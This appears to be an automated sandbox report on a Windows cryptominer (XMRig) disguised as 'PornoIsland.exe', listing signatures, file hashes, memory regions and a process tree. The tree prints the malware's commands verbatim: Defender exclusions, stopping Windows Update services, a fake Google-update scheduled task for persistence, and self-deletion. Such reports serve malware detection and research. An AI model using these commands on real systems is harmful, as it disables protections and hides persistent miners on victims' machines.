Analysis

  • max time kernel
    126s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    02-09-2023 17:38

General

  • Target

    PornoIsland.exe

  • Size

    9.8MB

  • MD5

    464d2b53055d68784c4daff138109464

  • SHA1

    e9a861ee47ea22b575e645838ad9965dfce4e463

  • SHA256

    a3b067bce2714ddff6f9af3e64a8138c9d3481b51f65c9e47f7ff72bd776e604

  • SHA512

    e778b2ded722174dd4396d4c9e44c3a873ba2fc4869056eb0cdeb72beaf62000ebd21651450a124473876f39bb08b0e9aca07cfe3623d0655f468480f7d49a91

  • SSDEEP

    196608:dGTBQHJTbJk3kJr3CG+Rnm/fMuOzA3k95gMwmqXmIQS:dCBQpTb60Jf+RnQf/+A3klw0IZ

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 11 IoCs
  • Stops running service(s) 3 TTPs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1276
      • C:\Users\Admin\AppData\Local\Temp\PornoIsland.exe
        "C:\Users\Admin\AppData\Local\Temp\PornoIsland.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:2080
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2236
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:1944
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:1936
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:1112
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:2924
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:2972
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#sqljzfy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2988
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
          3⤵
          • Creates scheduled task(s)
          PID:2660
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\PornoIsland.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2612
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:2732
        • C:\Windows\System32\schtasks.exe
          C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
          2⤵
            PID:2692
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2888
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2860
            • C:\Windows\System32\sc.exe
              sc stop UsoSvc
              3⤵
              • Launches sc.exe
              PID:2872
            • C:\Windows\System32\sc.exe
              sc stop WaaSMedicSvc
              3⤵
              • Launches sc.exe
              PID:1504
            • C:\Windows\System32\sc.exe
              sc stop wuauserv
              3⤵
              • Launches sc.exe
              PID:1964
            • C:\Windows\System32\sc.exe
              sc stop bits
              3⤵
              • Launches sc.exe
              PID:832
            • C:\Windows\System32\sc.exe
              sc stop dosvc
              3⤵
              • Launches sc.exe
              PID:1160
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#sqljzfy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
            2⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1052
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
              3⤵
              • Creates scheduled task(s)
              PID:2128
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe
            2⤵
              PID:536
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:1124
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {8BF876BB-EADA-4FEA-9A57-62BA34416E09} S-1-5-21-3185155662-718608226-894467740-1000:YETUIZPU\Admin:Interactive:[1]
            1⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2640
            • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
              C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
              2⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2684

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

            Filesize

            9.8MB

            MD5

            464d2b53055d68784c4daff138109464

            SHA1

            e9a861ee47ea22b575e645838ad9965dfce4e463

            SHA256

            a3b067bce2714ddff6f9af3e64a8138c9d3481b51f65c9e47f7ff72bd776e604

            SHA512

            e778b2ded722174dd4396d4c9e44c3a873ba2fc4869056eb0cdeb72beaf62000ebd21651450a124473876f39bb08b0e9aca07cfe3623d0655f468480f7d49a91

          • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

            Filesize

            9.8MB

            MD5

            464d2b53055d68784c4daff138109464

            SHA1

            e9a861ee47ea22b575e645838ad9965dfce4e463

            SHA256

            a3b067bce2714ddff6f9af3e64a8138c9d3481b51f65c9e47f7ff72bd776e604

            SHA512

            e778b2ded722174dd4396d4c9e44c3a873ba2fc4869056eb0cdeb72beaf62000ebd21651450a124473876f39bb08b0e9aca07cfe3623d0655f468480f7d49a91

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

            Filesize

            7KB

            MD5

            0fd516afdc4e30d1948b4db9c2686b1e

            SHA1

            5d41e3382b7ac164bc25f86a32db8158d2a989f9

            SHA256

            d3df91181317c91bcc5dfbf3d4f315bc18017213b04adb3b1b86f6c2b390209f

            SHA512

            88087f159211f0da7d15e62deea970a58cead504fca084028cde049a9216ea99738abd1de8fa3eb1d7a2e9b3bdc7b5775d14875823f08a503e07754449eaa9b7

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

            Filesize

            7KB

            MD5

            0fd516afdc4e30d1948b4db9c2686b1e

            SHA1

            5d41e3382b7ac164bc25f86a32db8158d2a989f9

            SHA256

            d3df91181317c91bcc5dfbf3d4f315bc18017213b04adb3b1b86f6c2b390209f

            SHA512

            88087f159211f0da7d15e62deea970a58cead504fca084028cde049a9216ea99738abd1de8fa3eb1d7a2e9b3bdc7b5775d14875823f08a503e07754449eaa9b7

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

            Filesize

            7KB

            MD5

            0fd516afdc4e30d1948b4db9c2686b1e

            SHA1

            5d41e3382b7ac164bc25f86a32db8158d2a989f9

            SHA256

            d3df91181317c91bcc5dfbf3d4f315bc18017213b04adb3b1b86f6c2b390209f

            SHA512

            88087f159211f0da7d15e62deea970a58cead504fca084028cde049a9216ea99738abd1de8fa3eb1d7a2e9b3bdc7b5775d14875823f08a503e07754449eaa9b7

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AAMADMOAG317I4R6LC15.temp

            Filesize

            7KB

            MD5

            0fd516afdc4e30d1948b4db9c2686b1e

            SHA1

            5d41e3382b7ac164bc25f86a32db8158d2a989f9

            SHA256

            d3df91181317c91bcc5dfbf3d4f315bc18017213b04adb3b1b86f6c2b390209f

            SHA512

            88087f159211f0da7d15e62deea970a58cead504fca084028cde049a9216ea99738abd1de8fa3eb1d7a2e9b3bdc7b5775d14875823f08a503e07754449eaa9b7

          • \Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

            Filesize

            9.8MB

            MD5

            464d2b53055d68784c4daff138109464

            SHA1

            e9a861ee47ea22b575e645838ad9965dfce4e463

            SHA256

            a3b067bce2714ddff6f9af3e64a8138c9d3481b51f65c9e47f7ff72bd776e604

            SHA512

            e778b2ded722174dd4396d4c9e44c3a873ba2fc4869056eb0cdeb72beaf62000ebd21651450a124473876f39bb08b0e9aca07cfe3623d0655f468480f7d49a91

          • memory/536-63-0x0000000140000000-0x000000014002A000-memory.dmp

            Filesize

            168KB

          • memory/536-66-0x0000000140000000-0x000000014002A000-memory.dmp

            Filesize

            168KB

          • memory/1052-50-0x00000000024C0000-0x0000000002540000-memory.dmp

            Filesize

            512KB

          • memory/1052-51-0x00000000024C0000-0x0000000002540000-memory.dmp

            Filesize

            512KB

          • memory/1052-55-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

            Filesize

            9.6MB

          • memory/1052-54-0x00000000024C0000-0x0000000002540000-memory.dmp

            Filesize

            512KB

          • memory/1052-53-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

            Filesize

            9.6MB

          • memory/1052-49-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

            Filesize

            9.6MB

          • memory/1052-52-0x00000000024C0000-0x0000000002540000-memory.dmp

            Filesize

            512KB

          • memory/1124-77-0x0000000140000000-0x00000001407EF000-memory.dmp

            Filesize

            7.9MB

          • memory/1124-71-0x0000000140000000-0x00000001407EF000-memory.dmp

            Filesize

            7.9MB

          • memory/1124-69-0x0000000140000000-0x00000001407EF000-memory.dmp

            Filesize

            7.9MB

          • memory/1124-67-0x0000000140000000-0x00000001407EF000-memory.dmp

            Filesize

            7.9MB

          • memory/1124-60-0x0000000000100000-0x0000000000120000-memory.dmp

            Filesize

            128KB

          • memory/1124-62-0x0000000000270000-0x0000000000290000-memory.dmp

            Filesize

            128KB

          • memory/1124-73-0x0000000140000000-0x00000001407EF000-memory.dmp

            Filesize

            7.9MB

          • memory/1124-75-0x0000000140000000-0x00000001407EF000-memory.dmp

            Filesize

            7.9MB

          • memory/1124-79-0x0000000140000000-0x00000001407EF000-memory.dmp

            Filesize

            7.9MB

          • memory/1124-65-0x0000000000270000-0x0000000000290000-memory.dmp

            Filesize

            128KB

          • memory/1124-64-0x0000000140000000-0x00000001407EF000-memory.dmp

            Filesize

            7.9MB

          • memory/1124-81-0x0000000140000000-0x00000001407EF000-memory.dmp

            Filesize

            7.9MB

          • memory/1124-83-0x0000000140000000-0x00000001407EF000-memory.dmp

            Filesize

            7.9MB

          • memory/2080-28-0x000000013F4B0000-0x000000013FE8B000-memory.dmp

            Filesize

            9.9MB

          • memory/2236-4-0x000000001B270000-0x000000001B552000-memory.dmp

            Filesize

            2.9MB

          • memory/2236-12-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

            Filesize

            9.6MB

          • memory/2236-11-0x00000000026E0000-0x0000000002760000-memory.dmp

            Filesize

            512KB

          • memory/2236-10-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

            Filesize

            9.6MB

          • memory/2236-7-0x00000000026E0000-0x0000000002760000-memory.dmp

            Filesize

            512KB

          • memory/2236-8-0x00000000026E0000-0x0000000002760000-memory.dmp

            Filesize

            512KB

          • memory/2236-9-0x00000000026E0000-0x0000000002760000-memory.dmp

            Filesize

            512KB

          • memory/2236-6-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

            Filesize

            9.6MB

          • memory/2236-5-0x0000000001F00000-0x0000000001F08000-memory.dmp

            Filesize

            32KB

          • memory/2684-61-0x000000013FCB0000-0x000000014068B000-memory.dmp

            Filesize

            9.9MB

          • memory/2888-41-0x00000000026E0000-0x0000000002760000-memory.dmp

            Filesize

            512KB

          • memory/2888-43-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

            Filesize

            9.6MB

          • memory/2888-42-0x00000000026E0000-0x0000000002760000-memory.dmp

            Filesize

            512KB

          • memory/2888-40-0x00000000026E0000-0x0000000002760000-memory.dmp

            Filesize

            512KB

          • memory/2888-39-0x00000000026E0000-0x0000000002760000-memory.dmp

            Filesize

            512KB

          • memory/2888-38-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

            Filesize

            9.6MB

          • memory/2888-37-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

            Filesize

            9.6MB

          • memory/2988-26-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

            Filesize

            9.6MB

          • memory/2988-25-0x00000000027B0000-0x0000000002830000-memory.dmp

            Filesize

            512KB

          • memory/2988-24-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

            Filesize

            9.6MB

          • memory/2988-18-0x000000001B2A0000-0x000000001B582000-memory.dmp

            Filesize

            2.9MB

          • memory/2988-21-0x00000000027B0000-0x0000000002830000-memory.dmp

            Filesize

            512KB

          • memory/2988-22-0x00000000027B0000-0x0000000002830000-memory.dmp

            Filesize

            512KB

          • memory/2988-23-0x00000000027B0000-0x0000000002830000-memory.dmp

            Filesize

            512KB

          • memory/2988-19-0x0000000002010000-0x0000000002018000-memory.dmp

            Filesize

            32KB

          • memory/2988-20-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

            Filesize

            9.6MB